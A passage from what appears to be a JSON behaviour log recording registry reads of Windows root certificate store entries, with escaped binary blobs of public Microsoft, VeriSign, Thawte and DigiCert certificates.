"Y\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1a\\x00\\x00\\x00E\\x00C\\x00D\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x003\\x008\\x004\\x00\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00}\\x9e}\\x1e\\x8d]\\xa1\\x1d\\xc0\\xc8K\\x07W\\xec\\xed\\xcb\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x002\\x99\\x19\\x81\\xbf\\x15u\\xa1\\xa50;\\xb9:8\\x17#\\xea4k\\x9e\\xc10\\xfd\\xb5\\x96\\xa7[\\xa1\\xd7\\xce\\x0b\n\\x06W\\x0b\\xb9\\x85\\xd2XA\\xe2;\\xe9D\\xe8\\xff\\x11\\x8f\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00l\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00E\\x00C\\x00C\\x00 \\x00P\\x00r\\x00o\\x00d\\x00u\\x00c\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00 \\x002\\x000\\x001\\x008\\x00\\x00\\x00i\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x02\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x06\\xf1\\xaa3\\x0b\\x92{u:@\\xe6\\x8c\\xdf\"\\xe3K\\xcb\\xef3R\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x1f\\x12N\\xde\\x13\\xe0j\\x02<\\xd7\\xc0\\x9aOH\\xc3\\xd6\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00C\\xefp\\x87\\xb8\\x9d\\xbf\\xec\\x88\\x19\\xdc\\xc6\\xc4ku\ru43\\x08\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x80\\x01\\x00\\x00 \\x00\\x00\\x00\\x01\\x00\\x00\\x00'\\x03\\x00\\x000\\x82\\x03#0\\x82\\x02\\xa8\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x14\\x98&f\\xdc|\\xcd\\x8f@Sg{\\xb9\\x99\\xec\\x850\n\\x06\\x08*\\x86H\\xce=\\x04\\x03\\x030\\x81\\x941\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x130\\x11\\x06\\x03U\\x04\\x08\\x13\nWashington1\\x100\\x0e\\x06\\x03U\\x04\\x07\\x13\\x07Redmond1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft C" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 261, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 262, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\\Blob", + "content": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xe5=4\\xce\\xcb\\x05\\xc1~\\xe32\\xc7I\\xd7\\x8c\\x02V\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00e\\xfcGR\\x0ff89b\\xec\\x0b{\\x88\\xa0\\x82\\x1d\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x18\\xf7\\xc1\\xfc\\xc3\t\\x02\\x03\\xfd[\\xaa/\\x86\\x1auIv\\xc8\\xdd%\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x00V\\x00e\\x00r\\x00i\\x00S\\x00i\\x00g\\x00n\\x00 \\x00T\\x00i\\x00m\\x00e\\x00 \\x00S\\x00t\\x00a\\x00m\\x00p\\x00i\\x00n\\x00g\\x00 \\x00C\\x00A\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00>\\xdf)\\x0c\\xc1\\xf5\\xccs,\\xeb=$\\xe1~R\\xda\\xbd'\\xe2\\xf0 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xc0\\x02\\x00\\x000\\x82\\x02\\xbc0\\x82\\x02%\\x02\\x10J\\x19\\xd28\\x8c\\x82Y\\x1c\\xa5]s_\\x15]\\xdc\\xa30\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x81\\x9e1\\x1f0\\x1d\\x06\\x03U\\x04\n\\x13\\x16VeriSign Trust Network1\\x170\\x15\\x06\\x03U\\x04\\x0b\\x13\\x0eVeriSign, Inc.1,0*\\x06\\x03U\\x04\\x0b\\x13#VeriSign Time Stamping Service Root1402\\x06\\x03U\\x04\\x0b\\x13+NO LIABILITY ACCEPTED, (c)97 VeriSign, Inc.0\\x1e\\x17\r970512000000Z\\x17\r040107235959Z0\\x81\\x9e1\\x1f0\\x1d\\x06\\x03U\\x04\n\\x13\\x16VeriSign Trust Network1\\x170\\x15\\x06\\x03U\\x04\\x0b\\x13\\x0eVeriSign, I" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 263, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 264, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\\Blob", + "content": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x7f\\xdf\\xf5\\x07)Dg\\x10$JD|\\xa2\\xa1\\x97\\xea\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x9d\\xf0\\xd11\\x00\\x12:\\xec\\xa7p\\x13\\x0fJ\\xd8\\xd2\t\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x002\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00T\\x00i\\x00m\\x00e\\x00s\\x00t\\x00a\\x00m\\x00p\\x00 \\x00R\\x00o\\x00o\\x00t\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00$\\\\x97\\xdfu\\x14\\xe7\\xcf-\\xf8\\xber\\xae\\x95{\\x9e\\x04t\\x1e\\x85\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x004O0-%i1\\x91\\xea\\xf7s\\\\xab\\xf5\\x86\\x8d7\\x82@\\xec \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb1\\x02\\x00\\x000\\x82\\x02\\xad0\\x82\\x02\\x16\\x02\\x01\\x010\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x81\\x9e1 0\\x1e\\x06\\x03U\\x04\n\\x13\\x17Microsoft Trust Network1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1-0+\\x06\\x03U\\x04\\x0b\\x13$Microsoft Time Stamping Service Root1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.0\\x1e\\x17\r970513161259Z\\x17\r991230235959Z0\\x81\\x9e1 0\\x1e\\x06\\x03U\\x04\n\\x13\\x17Microsoft Trust Network1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1-0+\\x06\\x03" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 265, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\31F9FC8BA3805986B721EA7295C65B3A44534274\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 266, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\31F9FC8BA3805986B721EA7295C65B3A44534274\\Blob", + "content": "Y\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1a\\x00\\x00\\x00E\\x00C\\x00D\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x003\\x008\\x004\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xe8G\\xc8B\\x9a\\xb0\\x9d\\xaeo\\x0b(;\\x98\\x15\\x8f\\xe3\\xb1\\xe8\\x80\\xb2\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00\\x03\\xd1\\xc7ge\\xed\\xa8\\x8b\\xc8\\xe0\\x87^`\\x91\\xd0`C%C\\xd1\\x80\\xbc\\xb8l\\x06I6\\xad\\xb9A\\xc4!cx\\x0b\\x82\\x89\\x92\\x1a\\x94\\xfe\\xbb\\x7f\\x9eG\\xed\\xac\\x12\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x007\\x94)X\\x86*\\x06\\xe6\\xbb\\xcf\\xd7\\xabY\\xc7\\xf2\\xf6c\\xec\\xdf@0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000p1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1!0\\x1f\\x06\\x03U\\x04\\x03\\x13\\x18Microsoft Root Authority0\\x1e\\x17\r970110070000Z\\x17\r201231070000Z0p1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1!0\\x1f\\x06\\x03U\\x04\\x03\\x13\\x18Microsoft R" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 278, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\BE36A4562FB2EE05DBB3D32323ADF445084ED656\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 279, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\BE36A4562FB2EE05DBB3D32323ADF445084ED656\\Blob", + "content": "\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xe8\\xa5\\x98\\xbe\\x84\\x82\\x8e\\xfe\\xaep\\x11\\x15\\x015v\\xb2\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x7ffzq\\xd3\\xebix \\x9aQ\\x14\\x9d\\x83\\xda \\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xbe6\\xa4V/\\xb2\\xee\\x05\\xdb\\xb3\\xd3##\\xad\\xf4E\\x08N\\xd6V\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00.\\x00\\x00\\x00T\\x00h\\x00a\\x00w\\x00t\\x00e\\x00 \\x00T\\x00i\\x00m\\x00e\\x00s\\x00t\\x00a\\x00m\\x00p\\x00i\\x00n\\x00g\\x00 \\x00C\\x00A\\x00\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x18\\x1c+\\xe0XQ\\xf9i\\x93\\xe1\\x96\\xf2y\\x95K#\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xdd\\xbc\\xbd\\x86\\x9c?\\x07\\xed@\\xe3\\x1b\\x08\\xef\\xce\\xc4\\xd1\\x88\\xcd;\\x15 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xa5\\x02\\x00\\x000\\x82\\x02\\xa10\\x82\\x02\n\\xa0\\x03\\x02\\x01\\x02\\x02\\x01\\x000\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x81\\x8b1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02ZA1\\x150\\x13\\x06\\x03U\\x04\\x08\\x13\\x0cWestern Cape1\\x140\\x12\\x06\\x03U\\x04\\x07\\x13\\x0bDurbanville1\\x0f0\r\\x06\\x03U\\x04\n\\x13\\x06Thawte1\\x1d0\\x1b\\x06\\x03U\\x04\\x0b\\x13\\x14Thawte Certification1\\x1f0\\x1d\\x06\\x03U\\x04\\x03\\x13\\x16Thawte Timestamping CA0\\x1e\\x17\r970101000000Z\\x17\r201231235959Z0\\x81\\x8b1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02ZA1\\x150\\x13\\x06\\x03U\\x04\\x08\\x13\\x0cWestern Cape1\\x140\\x12\\x06\\x03U\\x04\\x07\\x13\\x0bDurbanville1\\x0f0\r" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 280, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\CDD4EEAE6000AC7F40C3802C171E30148030C072\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 281, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\CDD4EEAE6000AC7F40C3802C171E30148030C072\\Blob", + "content": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5Jg\\x80\\xc0\\x92i\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x009\\x1b\\xe9(\\x83\\xd5%\t\\x15[\\xfe\\xae'\\xb9\\xbd4\\x01p\\xb7k\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xcd\\xd4\\xee\\xae`\\x00\\xac\\x7f@\\xc3\\x80,\\x17\\x1e0\\x14\\x800\\xc0r\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00J\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00\\x00\\x00i\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x02\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x0e\\xac\\x82`@V'\\x97\\xe5%\\x13\\xfc*\\xe1\nS\\x95Y\\xe4\\xa4 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x9d\\x05\\x00\\x000\\x82\\x05\\x990\\x82\\x03\\x81\\xa0\\x03\\x02\\x01\\x02\\x02\\x10y\\xad\\x16\\xa1J\\xa0\\xa5\\xadLsX\\xf4\\x07\\x13.e0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000_1\\x130\\x11\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\\x03com1\\x190\\x17\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\tmicrosoft1-0+\\x06\\x03U\\x04\\x03\\x13$Microsoft Root Certificate Authority0\\x1e\\x17\r010509231922Z\\x17\r210509232813Z0_1\\x130\\x11\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\\x03com1\\x190\\x17\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\tmicrosoft1-0+\\x06\\x03U\\x04\\x03\\x13$Microsoft Root Certificate A" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 282, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 283, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\\Blob", + "content": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00t\\x99f\\xce\\xcc\\x95\\xc1\\x87A\\x94\\xcar\\x03\\xf9\\xb6 \\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x05c\\xb8c\rb\\xd7Z\\xbb\\xc8\\xab\\x1eK\\xdf\\xb5\\xa8\\x99\\xb2MC\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00O_\\x10i09\\x8d\t\\x10{@\\xc3\\xc7\\xca\\x8f\\x1c\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x12\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00E\\xeb\\xa2\\xaf\\xf4\\x92\\xcb\\x821-Q\\x8b\\xa7\\xa7!\\x9d\\xf3m\\xc8\\x0fb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00>\\x90\\x99\\xb5\\x01^\\x8fHl\\x00\\xbc\\xea\\x9d\\x11\\x1e\\xe7!\\xfa\\xba5Z\\x89\\xbc\\xf1\\xdfiV\\x1e=\\xc62\\\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00m\\xca[\\xd0\r\\xcf\\x1c\\x0f2pY\\xd3t\\xb2\\x9c\\xa6\\xe3\\xc5\n\\xa6 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xbb\\x03\\x00\\x000\\x82\\x03\\xb70\\x82\\x02\\x9f\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x0c\\xe7\\xe0\\xe5\\x17\\xd8F\\xfe\\x8f\\xe5`\\xfc\\x1b\\xf0090\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000e1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x150\\x13\\x06\\x03U\\x04\n\\x13\\x0cDigiCert Inc1\\x190\\x17\\x06\\x03U\\x04\\x0b\\x13\\x10www.digicert.com1$0\"\\x06\\x03U\\x04\\x03\\x13\\x1bDigiCert Ass" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 284, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\4F65566336DB6598581D584A596C87934D5F2AB4\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 285, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\4F65566336DB6598581D584A596C87934D5F2AB4\\Blob", + "content": "\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xf1\\xbb\\xac-\\x908\\xdd\\xec\\x8d\\xb1s\\xc5;\\xc7**\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00x*\\x02\\xdf\\xdb.\\x14\\xd5\\xa7_\n\\xdf\\xb6\\x8e\\x9c]\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x008\\x00\\x00\\x00V\\x00e\\x00r\\x00i\\x00S\\x00i\\x00g\\x00n\\x00 \\x00C\\x00l\\x00a\\x00s\\x00s\\x00 \\x003\\x00 \\x00P\\x00r\\x00i\\x00m\\x00a\\x00r\\x00y\\x00 \\x00C\\x00A\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00*\\x00\\x00\\x000(\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xe2\\x7f{\\xd8w\\xd5\\xdf\\x9e\n?\\x9e\\xb4\\xcb\\x0e.\\xa9\\xef\\xdbiw\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00'\\xb3Qvg3\\x1c\\xe2\\xc1\\xe7@\\x02\\xb5\\xff\"\\x98\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00OeVc6\\xdbe\\x98X\\x1dXJYl\\x87\\x93M_*\\xb4\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04 \\x00\\x00\\x00\\x01\\x00\\x00\\x00A\\x02\\x00\\x000\\x82\\x02=0\\x82\\x01\\xa6\\x02\\x11\\x00\\xe4\\x9e\\xfd\\xf3:\\xe8\\x0e\\xcf\\xa5\\x11>\\x19\\xa4$\\x0220\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x000_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1705\\x06\\x03U\\x04\\x0b\\x13.Class 3 Public Primary Certification Authority0\\x1e\\x17\r960129000000Z\\x17\r040107235959Z0_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriS" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 286, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\51501FBFCE69189D609CFAF140C576755DCC1FDF\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 287, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\51501FBFCE69189D609CFAF140C576755DCC1FDF\\Blob", + "content": "Y\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x16\\x00\\x00\\x00R\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x002\\x005\\x006\\x00\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00O\\xcb\\x14\\xf7\\xc4\\xa3\\x8f/&\\\\x1f\\x12\\xc9\\xafVw\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xbeR\\xe4a\\xb1}\\xd6%'q%\\x1bE\\xe9\\x8f\\x122\\xca\\xa1%\\x12\\xdcy\\x11\\x8d\\x0c_\\xces\\xa5M\\x95\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00>\\x00\\x00\\x00H\\x00o\\x00t\\x00s\\x00p\\x00o\\x00t\\x00 \\x002\\x00.\\x000\\x00 \\x00T\\x00r\\x00u\\x00s\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00A\\x00 \\x00-\\x00 \\x000\\x003\\x00\\x00\\x00b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xa3\\xcchY]\\xfe~\\x86\\xd8\\xad\\x17r\\xa8\\xb5(J\\xddT\\xac\\xe3\\xb8\\xa7\\x98\\xdfG\\xbc\\xca\\xfb\\x1f\\xdb\\x84\\xdf\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x000\\x1e\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00g\\x0eI,a\\x17\\x9e\\xeb\\xed\\xe0T\\xe7\\x84\\xd9\\x9b\\xadd`se\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00[\\xcb\\x93\\xea\\xdb}mO\\xb7\\xa0\n/:\\xe5\\x03\\x0c\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00QP\\x1f\\xbf\\xcei\\x18\\x9d`\\x9c\\xfa\\xf1@\\xc5vu]\\xcc\\x1f\\xdf\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xeb\\x15w\\xb4\\x0b<\\x8b\\xab\\xae4m\\xd9\\x8e\\xad\\x07\\x80\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x10\\x00\\x00 \\x00\\x00\\x00\\x01\\x00\\x00\\x00p\\x05\\x00\\x000\\x82\\x05l0\\x82\\x03T\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x0c\\xb3\\x0fp\\xf2\\x86\\xa43\\xe0\\xb9\t\\x89\\xde\\x01\\xed\\xb70\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000P1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x180\\x16\\x06\\x03U\\x04\n\\x13\\x0fWFA Hotspot 2.01'0%\\x06\\x03U\\x04\\x03" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 288, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,671", + "eid": 289, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74\\Blob", + "content": 